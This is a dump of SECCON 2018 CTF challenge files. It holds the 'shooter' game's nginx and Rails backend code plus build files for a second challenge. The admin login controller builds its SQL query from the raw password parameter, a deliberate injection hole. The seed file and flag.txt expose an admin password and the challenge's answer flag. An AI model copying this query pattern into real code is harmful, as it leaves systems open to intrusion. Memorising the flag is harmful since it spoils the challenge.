 7 |     public static string stgDomain = "staging.shooter.pwn.seccon.jp";
 8 |     public static string devDomain = "develop.shooter.pwn.seccon.jp";
 9 |     public static string adminApi = "/admin";
10 | }
11 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/app/scripts/PlaneGenerator.cs:
--------------------------------------------------------------------------------
 1 | using System.Collections;
 2 | using System.Collections.Generic;
 3 | using UnityEngine;
 4 | 
 5 | public class PlaneGenerator : MonoBehaviour {
 6 |     public GameObject planePrefab;
 7 |     public float span = 1.0f;
 8 |     float delta = 0;
 9 | 
10 | 	// Use this for initialization
11 | 	void Start () {
12 | 		
13 | 	}
14 | 	
15 | 	// Update is called once per frame
16 | 	void Update () {
17 |         this.delta += Time.deltaTime;
18 |         if (this.delta >= this.span)
19 |         {
20 |             this.delta = 0;
21 |             this.span *= 0.97f;
22 |             Instantiate(planePrefab);
23 |         }
24 | 	}
25 | 
26 |     public void Initialize()
27 |     {
28 |         span = 1.0f;
29 |     }
30 | }
31 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/nginx/conf.d/default:
--------------------------------------------------------------------------------
 1 | server {
 2 |   listen *:80 default_server;
 3 |   server_name _;
 4 | 
 5 |   access_log /var/log/nginx/default_access.log;
 6 |   error_log /var/log/nginx/default_error.log;
 7 | 
 8 |   location / {
 9 |     return 404;
10 |   }
11 | }
12 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/nginx/conf.d/develop.shooter.pwn.seccon.jp:
--------------------------------------------------------------------------------
 1 | upstream shooter_dev {
 2 |   server unix:/var/www/app/shooter_dev/current/tmp/sockets/puma.sock;
 3 | }
 4 | 
 5 | server {
 6 |   listen *:80;
 7 |   server_name develop.shooter.pwn.seccon.jp;
 8 | 
 9 |   allow 192.168.0.1;
10 |   deny all;
11 | 
12 |   access_log /var/log/nginx/develop.shooter.pwn.seccon.jp_access.log;
13 |   error_log /var/log/nginx/develop.shooter.pwn.seccon.jp_error.log;
14 | 
15 |   location ~ ^/(assets|apple-icon|ms-icon|apple-touch|favicon|browserconfig|robots|manifest|android-icon) {
16 |     root /var/www/app/shooter_dev/current/public;
17 |   }
18 | 
19 |   location ~ ^/(assets|uploads) {
20 |     root /var/www/app/shooter_dev/current/public;
21 |   }
22 | 
23 |   location ~ ^/ {
24 |     proxy_redirect                        off;
25 |     proxy_set_header    Host              $host;
26 |     proxy_set_header    X-Real-IP         $remote_addr;
27 |     proxy_set_header    X-Forwarded-For   $proxy_add_x_forwarded_for;
28 |     proxy_set_header    X-Forwarded-Proto $scheme;
29 |     proxy_set_header    X-Forwarded-Port  $server_port;
30 |     proxy_set_header    X-Forwarded-Host  $host;
31 | 
32 |     proxy_pass http://shooter_dev;
33 |   }
34 | }
35 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/nginx/conf.d/shooter.pwn.seccon.jp:
--------------------------------------------------------------------------------
 1 | upstream shooter {
 2 |   server unix:/var/www/app/shooter/current/tmp/sockets/puma.sock;
 3 | }
 4 | 
 5 | server {
 6 |   listen *:80;
 7 |   server_name shooter.pwn.seccon.jp;
 8 | 
 9 |   access_log /var/log/nginx/shooter.pwn.seccon.jp_access.log;
10 |   error_log /var/log/nginx/shooter.pwn.seccon.jp_error.log;
11 | 
12 |   location ~ ^/(assets|apple-icon|ms-icon|apple-touch|favicon|browserconfig|robots|manifest|android-icon) {
13 |     root /var/www/app/shooter/current/public;
14 |   }
15 | 
16 |   location ~ ^/(assets|uploads) {
17 |     root /var/www/app/shooter/current/public;
18 |   }
19 | 
20 |   location ~ ^/ {
21 |     proxy_redirect                        off;
22 |     proxy_set_header    Host              $host;
23 |     proxy_set_header    X-Real-IP         $remote_addr;
24 |     proxy_set_header    X-Forwarded-For   $proxy_add_x_forwarded_for;
25 |     proxy_set_header    X-Forwarded-Proto $scheme;
26 |     proxy_set_header    X-Forwarded-Port  $server_port;
27 |     proxy_set_header    X-Forwarded-Host  $host;
28 | 
29 |     proxy_pass http://shooter;
30 | 
31 |     location ~ ^/admin {
32 |       allow 192.168.0.1;
33 |       deny all;
34 |     }
35 |   }
36 | }
37 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/nginx/conf.d/staging.shooter.pwn.seccon.jp:
--------------------------------------------------------------------------------
 1 | upstream shooter_stg {
 2 |   server unix:/var/www/app/shooter_stg/current/tmp/sockets/puma.sock;
 3 | }
 4 | 
 5 | server {
 6 |   listen *:80;
 7 |   server_name staging.shooter.pwn.seccon.jp;
 8 | 
 9 |   access_log /var/log/nginx/staging.shooter.pwn.seccon.jp_access.log;
10 |   error_log /var/log/nginx/staging.shooter.pwn.seccon.jp_error.log;
11 | 
12 |   location ~ ^/(assets|apple-icon|ms-icon|apple-touch|favicon|browserconfig|robots|manifest|android-icon) {
13 |     root /var/www/app/shooter_stg/current/public;
14 |   }
15 | 
16 |   location ~ ^/(assets|uploads) {
17 |     root /var/www/app/shooter_stg/current/public;
18 |   }
19 | 
20 |   location ~ ^/ {
21 |     proxy_redirect                        off;
22 |     proxy_set_header    Host              $host;
23 |     proxy_set_header    X-Real-IP         $remote_addr;
24 |     proxy_set_header    X-Forwarded-For   $proxy_add_x_forwarded_for;
25 |     proxy_set_header    X-Forwarded-Proto $scheme;
26 |     proxy_set_header    X-Forwarded-Port  $server_port;
27 |     proxy_set_header    X-Forwarded-Host  $host;
28 | 
29 |     proxy_pass http://shooter_stg;
30 |   }
31 | }
32 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/nginx/nginx.conf:
--------------------------------------------------------------------------------
 1 | user              nginx;
 2 | worker_processes  2;
 3 | pid               /var/run/nginx.pid;
 4 | 
 5 | events {
 6 |     worker_connections  1024;
 7 |     accept_mutex on;
 8 | }
 9 | 
10 | http {
11 |     server_tokens off;
12 |     include       mime.types;
13 |     default_type  application/octet-stream;
14 |     server_names_hash_bucket_size 128;
15 | 
16 |     proxy_cache_path    /var/cache/nginx/static_file_cache levels=1:2 keys_zone=cache_static_file:128m inactive=1d max_size=512m;
17 |     proxy_temp_path     /var/cache/nginx/temp;
18 | 
19 |     access_log  /var/log/nginx/access.log;
20 |     error_log  /var/log/nginx/error.log;
21 | 
22 |     sendfile        on;
23 |     keepalive_timeout  65;
24 | 
25 |     gzip  on;
26 |     gzip_http_version 1.0;
27 |     gzip_min_length 1100;
28 |     gzip_disable "msie [1-6]\.";
29 |     gzip_disable "Mozilla/4";
30 |     gzip_comp_level 1;
31 |     gzip_types text/plain text/xml text/css text/comma-separated-values text/javascript application/x-javascript application/atom+xml;
32 | 
33 |     include /usr/local/nginx/conf.d/*;
34 | }
35 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/assets/config/manifest.js:
--------------------------------------------------------------------------------
1 | //= link_tree ../images
2 | //= link_directory ../javascripts .js
3 | //= link_directory ../stylesheets .css
4 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/assets/images/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/shooter/build/server/shooter/app/assets/images/.keep


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/assets/javascripts/application.js:
--------------------------------------------------------------------------------
 1 | // This is a manifest file that'll be compiled into application.js, which will include all the files
 2 | // listed below.
 3 | //
 4 | // Any JavaScript/Coffee file within this directory, lib/assets/javascripts, or any plugin's
 5 | // vendor/assets/javascripts directory can be referenced here using a relative path.
 6 | //
 7 | // It's not advisable to add code directly here, but if you do, it'll appear at the bottom of the
 8 | // compiled file. JavaScript code in this file should be added after the last require_* statement.
 9 | //
10 | // Read Sprockets README (https://github.com/rails/sprockets#sprockets-directives) for details
11 | // about supported directives.
12 | //
13 | //= require rails-ujs
14 | //= require activestorage
15 | //= require turbolinks
16 | //= require_tree .
17 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/assets/javascripts/cable.js:
--------------------------------------------------------------------------------
 1 | // Action Cable provides the framework to deal with WebSockets in Rails.
 2 | // You can generate new channels where WebSocket features live using the `rails generate channel` command.
 3 | //
 4 | //= require action_cable
 5 | //= require_self
 6 | //= require_tree ./channels
 7 | 
 8 | (function() {
 9 |   this.App || (this.App = {});
10 | 
11 |   App.cable = ActionCable.createConsumer();
12 | 
13 | }).call(this);
14 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/assets/javascripts/channels/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/shooter/build/server/shooter/app/assets/javascripts/channels/.keep


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/assets/stylesheets/application.scss:
--------------------------------------------------------------------------------
1 | @import "bootstrap";
2 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/channels/application_cable/channel.rb:
--------------------------------------------------------------------------------
1 | # frozen_string_literal: true
2 | 
3 | module ApplicationCable
4 |   class Channel < ActionCable::Channel::Base
5 |   end
6 | end
7 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/channels/application_cable/connection.rb:
--------------------------------------------------------------------------------
1 | # frozen_string_literal: true
2 | 
3 | module ApplicationCable
4 |   class Connection < ActionCable::Connection::Base
5 |   end
6 | end
7 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/controllers/admin/dashboards_controller.rb:
--------------------------------------------------------------------------------
1 | # frozen_string_literal: true
2 | 
3 | class Admin::DashboardsController < AdminController
4 |   def index; end
5 | end
6 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/controllers/admin/sessions_controller.rb:
--------------------------------------------------------------------------------
 1 | # frozen_string_literal: true
 2 | 
 3 | class Admin::SessionsController < ApplicationController
 4 |   def new; end
 5 | 
 6 |   def create
 7 |     if Manager.where(login_id: params[:login_id]).where("password_hash = LCASE(MD5('#{params[:password]}'))").exists?
 8 |       session[:logined] = true
 9 |       redirect_to admin_root_path
10 |       return
11 |     end
12 |     redirect_to new_admin_session_path
13 |   end
14 | end
15 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/controllers/admin/system_configs_controller.rb:
--------------------------------------------------------------------------------
1 | # frozen_string_literal: true
2 | 
3 | class Admin::SystemConfigsController < AdminController
4 |   def show; end
5 | end
6 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/controllers/admin/users_controller.rb:
--------------------------------------------------------------------------------
1 | # frozen_string_literal: true
2 | 
3 | class Admin::UsersController < AdminController
4 |   def index; end
5 | end
6 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/controllers/admin_controller.rb:
--------------------------------------------------------------------------------
 1 | # frozen_string_literal: true
 2 | 
 3 | class AdminController < ApplicationController
 4 |   before_action :authenticate!
 5 | 
 6 |   def index; end
 7 | 
 8 |   private
 9 | 
10 |   def authenticate!
11 |     unless session[:logined]
12 |       redirect_to new_admin_session_path
13 |     end
14 |   end
15 | end
16 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/controllers/api/v1/scores_controller.rb:
--------------------------------------------------------------------------------
 1 | # frozen_string_literal: true
 2 | 
 3 | class Api::V1::ScoresController < ApiController
 4 |   def create
 5 |     return if params[:name].blank?
 6 | 
 7 |     params[:name] = params[:name].to_s
 8 |     params[:name] = params[:name][0, [params[:name].length, 12].min]
 9 |     Score.create(name: params[:name], score: params[:score])
10 |     render json: { records: Score.ranking_around(params[:name]) }
11 |   end
12 | end
13 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/controllers/api_controller.rb:
--------------------------------------------------------------------------------
1 | # frozen_string_literal: true
2 | 
3 | class ApiController < ActionController::API
4 |   include ActionController::MimeResponds
5 | end
6 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/controllers/application_controller.rb:
--------------------------------------------------------------------------------
1 | # frozen_string_literal: true
2 | 
3 | class ApplicationController < ActionController::Base
4 | end
5 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/controllers/concerns/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/shooter/build/server/shooter/app/controllers/concerns/.keep


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/helpers/application_helper.rb:
--------------------------------------------------------------------------------
1 | # frozen_string_literal: true
2 | 
3 | module ApplicationHelper
4 | end
5 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/javascript/packs/application.js:
--------------------------------------------------------------------------------
 1 | /* eslint no-console:0 */
 2 | // This file is automatically compiled by Webpack, along with any other files
 3 | // present in this directory. You're encouraged to place your actual application logic in
 4 | // a relevant structure within app/javascript and only use these pack files to reference
 5 | // that code so it'll be compiled.
 6 | //
 7 | // To reference this file, add <%= javascript_pack_tag 'application' %> to the appropriate
 8 | // layout file, like app/views/layouts/application.html.erb
 9 | 
10 | console.log('Hello World from Webpacker')
11 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/jobs/application_job.rb:
--------------------------------------------------------------------------------
1 | # frozen_string_literal: true
2 | 
3 | class ApplicationJob < ActiveJob::Base
4 | end
5 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/mailers/application_mailer.rb:
--------------------------------------------------------------------------------
1 | # frozen_string_literal: true
2 | 
3 | class ApplicationMailer < ActionMailer::Base
4 |   default from: 'from@example.com'
5 |   layout 'mailer'
6 | end
7 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/models/application_record.rb:
--------------------------------------------------------------------------------
1 | # frozen_string_literal: true
2 | 
3 | class ApplicationRecord < ActiveRecord::Base
4 |   self.abstract_class = true
5 | end
6 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/models/concerns/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/shooter/build/server/shooter/app/models/concerns/.keep


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/models/flag.rb:
--------------------------------------------------------------------------------
 1 | # == Schema Information
 2 | #
 3 | # Table name: flags
 4 | #
 5 | #  id         :bigint(8)        not null, primary key
 6 | #  value      :string(255)
 7 | #  created_at :datetime         not null
 8 | #  updated_at :datetime         not null
 9 | #
10 | 
11 | class Flag < ApplicationRecord
12 | end
13 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/models/manager.rb:
--------------------------------------------------------------------------------
 1 | # frozen_string_literal: true
 2 | 
 3 | # == Schema Information
 4 | #
 5 | # Table name: managers
 6 | #
 7 | #  id            :bigint(8)        not null, primary key
 8 | #  login_id      :string(255)
 9 | #  password_hash :string(255)
10 | #  created_at    :datetime         not null
11 | #  updated_at    :datetime         not null
12 | #
13 | 
14 | class Manager < ApplicationRecord
15 | end
16 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/models/score.rb:
--------------------------------------------------------------------------------
 1 | # frozen_string_literal: true
 2 | 
 3 | # == Schema Information
 4 | #
 5 | # Table name: scores
 6 | #
 7 | #  id         :bigint(8)        not null, primary key
 8 | #  score      :integer
 9 | #  name       :string(255)
10 | #  created_at :datetime         not null
11 | #  updated_at :datetime         not null
12 | #
13 | 
14 | class Score < ApplicationRecord
15 |   include Redis::Objects
16 |   after_save :set_score
17 | 
18 |   sorted_set 'ranking', global: true
19 | 
20 |   def self.ranking_around(name)
21 |     nearby_ranks = ranking_nearby(name)
22 |     total = ranking.rank(ranking.last) + 1
23 |     first_rank = total - ranking.rank(nearby_ranks.first[0])
24 |     ret = []
25 |     nearby_ranks.size.times do |i|
26 |       ret.push(
27 |         rank: i + first_rank,
28 |         name: nearby_ranks[i][0],
29 |         score: nearby_ranks[i][1]
30 |       )
31 |     end
32 |     ret
33 |   end
34 | 
35 |   private
36 | 
37 |   class << self
38 |     def ranking_nearby(name)
39 |       rank = ranking.rank(name)
40 |       total = ranking.rank(ranking.last) + 1
41 |       ranking.range([rank - 10, 0].max, [rank + 10, total - 1].min, with_scores: true).reverse
42 |     end
43 |   end
44 | 
45 |   def set_score
46 |     score = Score.ranking.score(name)
47 |     return if score && score > self.score
48 | 
49 |     Score.ranking[name] = self.score
50 |   end
51 | end
52 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/views/admin/dashboards/index.html.slim:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/shooter/build/server/shooter/app/views/admin/dashboards/index.html.slim


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/views/admin/index.html.slim:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/shooter/build/server/shooter/app/views/admin/index.html.slim


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/views/admin/sessions/new.html.slim:
--------------------------------------------------------------------------------
 1 | = form_tag admin_sessions_path, method: :post do
 2 |   .form-group
 3 |     .form-group
 4 |       label Login ID
 5 |       = text_field_tag :login_id, '', class: 'form-control'
 6 |     .form-group
 7 |       label Password
 8 |       = password_field_tag :password, '', class: 'form-control'
 9 |     .form-group
10 |       = submit_tag 'Login', class: 'btn btn-primary'
11 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/views/admin/system_configs/show.html.slim:
--------------------------------------------------------------------------------
1 | .row
2 |   .col-sm
3 |     .alert.alert-dark
4 |       | No settings available.
5 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/views/admin/users/index.html.slim:
--------------------------------------------------------------------------------
1 | .row
2 |   h1 Last 20 scores
3 | .row
4 |   ul.list-group
5 |     - Score.order(id: :desc).limit(20).each do |score|
6 |       li.list-group-item
7 |         | #{score.id}: #{score.name} (#{score.score})
8 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/views/layouts/application.html.slim:
--------------------------------------------------------------------------------
 1 | doctype html
 2 | html
 3 |   head
 4 |     meta charset="utf-8"
 5 |     meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"
 6 | 
 7 |     title
 8 |       | Shooter Admin
 9 |     = csrf_meta_tags
10 |     = csp_meta_tag
11 |     = stylesheet_link_tag    'application', media: 'all', 'data-turbolinks-track': 'reload'
12 |     = javascript_include_tag 'application', 'data-turbolinks-track': 'reload'
13 |   body
14 |     .navbar.navbar-expand-lg.navbar-light.bg-light.mb-3
15 |       a.navbar-brand Shooter Admin
16 |       .collapse.navbar-collapse
17 |         ul.navbar-nav.mr-auto
18 |           li.nav-item
19 |             = link_to admin_users_path, class: 'nav-link' do
20 |               | Users
21 |           li.nav-item
22 |             = link_to admin_system_config_path, class: 'nav-link' do
23 |               | SystemConfig
24 |     .container
25 |       = yield
26 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/views/layouts/mailer.html.slim:
--------------------------------------------------------------------------------
1 | doctype html
2 | html
3 |   head
4 |     meta[http-equiv="Content-Type" content="text/html; charset=utf-8"]
5 |     style
6 |       |  /* Email styles need to be inline */ 
7 |   body
8 |     = yield
9 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/app/views/layouts/mailer.text.slim:
--------------------------------------------------------------------------------
1 | = yield
2 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/config/routes.rb:
--------------------------------------------------------------------------------
 1 | Rails.application.routes.draw do
 2 |   namespace :admin do
 3 |     root to: 'dashboards#index'
 4 |     resources :users, only: %i[index]
 5 |     resource :system_config, only: %i[show]
 6 |     resources :sessions, only: %i[new create]
 7 |   end
 8 | 
 9 |   namespace :api do
10 |     namespace :v1 do
11 |       resources :scores, only: %i[create]
12 |     end
13 |   end
14 | end
15 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/db/migrate/20181008083436_create_scores.rb:
--------------------------------------------------------------------------------
 1 | class CreateScores < ActiveRecord::Migration[5.2]
 2 |   def change
 3 |     create_table :scores do |t|
 4 |       t.integer :score
 5 |       t.string :name
 6 |       t.timestamps
 7 |     end
 8 |   end
 9 | end
10 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/db/migrate/20181008134533_create_managers.rb:
--------------------------------------------------------------------------------
 1 | class CreateManagers < ActiveRecord::Migration[5.2]
 2 |   def change
 3 |     create_table :managers do |t|
 4 |       t.string :login_id
 5 |       t.string :password_hash
 6 | 
 7 |       t.timestamps
 8 |     end
 9 |   end
10 | end
11 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/db/migrate/20181008142316_create_flags.rb:
--------------------------------------------------------------------------------
 1 | class CreateFlags < ActiveRecord::Migration[5.2]
 2 |   def change
 3 |     create_table :flags do |t|
 4 |       t.string :value
 5 | 
 6 |       t.timestamps
 7 |     end
 8 |   end
 9 | end
10 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/db/schema.rb:
--------------------------------------------------------------------------------
 1 | # This file is auto-generated from the current state of the database. Instead
 2 | # of editing this file, please use the migrations feature of Active Record to
 3 | # incrementally modify your database, and then regenerate this schema definition.
 4 | #
 5 | # Note that this schema.rb definition is the authoritative source for your
 6 | # database schema. If you need to create the application database on another
 7 | # system, you should be using db:schema:load, not running all the migrations
 8 | # from scratch. The latter is a flawed and unsustainable approach (the more migrations
 9 | # you'll amass, the slower it'll run and the greater likelihood for issues).
10 | #
11 | # It's strongly recommended that you check this file into your version control system.
12 | 
13 | ActiveRecord::Schema.define(version: 2018_10_08_142316) do
14 | 
15 |   create_table "flags", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8", force: :cascade do |t|
16 |     t.string "value"
17 |     t.datetime "created_at", null: false
18 |     t.datetime "updated_at", null: false
19 |   end
20 | 
21 |   create_table "managers", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8", force: :cascade do |t|
22 |     t.string "login_id"
23 |     t.string "password_hash"
24 |     t.datetime "created_at", null: false
25 |     t.datetime "updated_at", null: false
26 |   end
27 | 
28 |   create_table "scores", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8", force: :cascade do |t|
29 |     t.integer "score"
30 |     t.string "name"
31 |     t.datetime "created_at", null: false
32 |     t.datetime "updated_at", null: false
33 |   end
34 | 
35 | end
36 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/server/shooter/db/seeds.rb:
--------------------------------------------------------------------------------
1 | if Manager.count.zero?
2 |   Manager.create(login_id: 'admin', password_hash: Digest::MD5.hexdigest('Xc8LmM5T'))
3 | end
4 | 
5 | if Rails.env.staging? && Flag.count.zero?
6 |   Flag.create(value: 'SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10N}')
7 | end
8 | 


--------------------------------------------------------------------------------
/Reversing/shooter/files/shooter.apk_d0d2ed9e7ba3c83354cbbf7ccf82541730b14a72:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/shooter/files/shooter.apk_d0d2ed9e7ba3c83354cbbf7ccf82541730b14a72


--------------------------------------------------------------------------------
/Reversing/shooter/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10N}
2 | 


--------------------------------------------------------------------------------
/Reversing/shooter/question.txt:
--------------------------------------------------------------------------------
1 | shooter
2 | Enjoy the game!
3 | 


--------------------------------------------------------------------------------
/Reversing/special_device/build/build.txt:
--------------------------------------------------------------------------------
 1 | ■ 環境構築方法
 2 | 
 3 | ・以下のツールによりクロスビルド環境を構築
 4 |   http://kozos.jp/books/asm/cross-gcc494-v1.0.tgz
 5 | 
 6 |   (構築例)
 7 |   $ tar xvzf cross-gcc494-v1.0.tgz
 8 |   $ cd cross-gcc494
 9 |   $ vi config.sh (modiry install_dir and makeopt)
10 |   $ cd toolchain
11 |   $ ./fetch.sh
12 |   $ ./setup.sh
13 |   $ cd ../build
14 |   $ ./setup-all.sh
15 |   $ ./build-install-clean-all.sh aarch64-elf
16 | 
17 | ■ おしまい
18 | 


--------------------------------------------------------------------------------
/Reversing/special_device/build/build/cross-gcc494/KL-01:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/special_device/build/build/cross-gcc494/KL-01


--------------------------------------------------------------------------------
/Reversing/special_device/build/build/cross-gcc494/LICENSE:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/special_device/build/build/cross-gcc494/LICENSE


--------------------------------------------------------------------------------
/Reversing/special_device/build/build/cross-gcc494/config.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | 
 3 | #install_dir="/usr/local/cross-gcc494"
 4 | install_dir="$HOME/cross-gcc494"
 5 | 
 6 | binutils="binutils-2.28"
 7 | gcc="gcc-4.9.4"
 8 | newlib="newlib-2.5.0"
 9 | gdb="gdb-7.12.1"
10 | 
11 | gmp="gmp-6.1.2"
12 | mpfr="mpfr-3.1.5"
13 | mpc="mpc-1.0.3"
14 | 
15 | #makeopt="-j 2"
16 | 


--------------------------------------------------------------------------------
/Reversing/special_device/build/build/cross-gcc494/exec/aarch64-elf.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/special_device/build/build/cross-gcc494/exec/aarch64-elf.o


--------------------------------------------------------------------------------
/Reversing/special_device/build/build/cross-gcc494/exec/aarch64-elf.x:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/special_device/build/build/cross-gcc494/exec/aarch64-elf.x


--------------------------------------------------------------------------------
/Reversing/special_device/build/build/cross-gcc494/exec/ld.scr:
--------------------------------------------------------------------------------
 1 | ENTRY("_start")
 2 | 
 3 | SECTIONS
 4 | {
 5 | 	/* for Motorola 68HC11 */
 6 | 	_.tmp = 0x40; . += 4;
 7 | 	_.xy = .; . += 4; _.z = .; . += 4;
 8 | 	/* for option -fno-omit-frame-pointer */
 9 | 	_.frame = .; . += 4;
10 | 	/* without option -msoft-reg-count */
11 | 	_.d1 = .; . += 4; _.d2 = .; . += 4;
12 | 	_.d3 = .; . += 4; _.d4 = .; . += 4;
13 | 
14 | 	.text 0x1400 : {
15 | 		*(.text .text.*)
16 | 		_etext = .;
17 | 	}
18 | 
19 | 	.rodata : {
20 | 		*(.rodata .rodata.*)
21 | 		_erodata = .;
22 | 	}
23 | 
24 | 	. = ALIGN(0x400);
25 | 	_gp = .;
26 | 
27 | 	.data : {
28 | 		*(.data .data.*)
29 | 		*(.sdata .sdata.*)
30 | 		_edata = .;
31 | 	}
32 | 
33 | 	.bss : {
34 | 		*(.bss .bss.*)
35 | 		*(.sbss .sbss.*)
36 | 		*(.scommon)
37 | 		*(COMMON)
38 | 		_ebss = .;
39 | 	}
40 | 
41 | 	.stack ALIGN(16) : {
42 | 		. += 1024;
43 | 		_estack = .;
44 | 	}
45 | 
46 | 	_end = .;
47 | }
48 | 


--------------------------------------------------------------------------------
/Reversing/special_device/build/build/cross-gcc494/exec/lib-aarch64-elf.S:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * Use halt handler.
 3 |  * See gdb/sim/aarch64/simulator.c:handle_halt()
 4 |  */
 5 | 
 6 | #define AngelSVC_Reason_Open  0x01
 7 | #define AngelSVC_Reason_Close 0x02
 8 | #define AngelSVC_Reason_Write 0x05
 9 | #define AngelSVC_Reason_Read  0x06
10 | 
11 | /*
12 |  * See gdb/sim/aarch64/simulator.c:
13 |  * aarch64_decode_and_execute() (case GROUP_BREXSYS_1010:)
14 |  * dexBr() (case BR_REG_110:)
15 |  * dexExcpnGen()
16 |  */
17 | #define HALT_GROUP  (10 << 25) /* GROUP_BREXSYS_1010 */
18 | #define HALT_GROUP2 ( 6 << 29) /* BR_REG_110 */
19 | #define HALT_OPC2   ( 0 <<  2) /* OK */
20 | #define HALT_LL     ( 0 <<  0)
21 | #define HALT_OPC(opc)     ((opc)   << 21) /* 1:BRK, 2:HLT */
22 | #define HALT_IMM16(imm16) ((imm16) << 5)
23 | 
24 | #define CALL_ExcpnGen(opc, imm16) \
25 | 	.long (HALT_GROUP | HALT_GROUP2 | HALT_OPC2 | HALT_LL | \
26 | 	HALT_OPC(opc) | HALT_IMM16(imm16))
27 | 
28 | /* See gdb/sim/aarch64/simulator.c:dexExcpnGen() (opc == 1 && LL == 0) */
29 | #define CALL_BRK CALL_ExcpnGen(1, 0)
30 | 
31 | /*
32 |  * See gdb/sim/aarch64/simulator.c:dexExcpnGen() (opc == 1 && LL == 0)
33 |  * See gdb/sim/aarch64/simulator.c:handle_halt() (imm16 == 0xf000)
34 |  */
35 | #define CALL_HLT CALL_ExcpnGen(2, 0xf000)
36 | 
37 | 	.section .text
38 | 
39 | 	.globl	_start
40 | 	.type	_start, %function
41 | _start:
42 | 	ldr	x0, _stack_addr
43 | 	mov	sp, x0
44 | 	bl	main
45 | 
46 | 	/*
47 | 	 * Registers as return value and first argument are same.
48 | 	 * Setup of first argument is unneed.
49 | 	 */
50 | 	/* fall through */
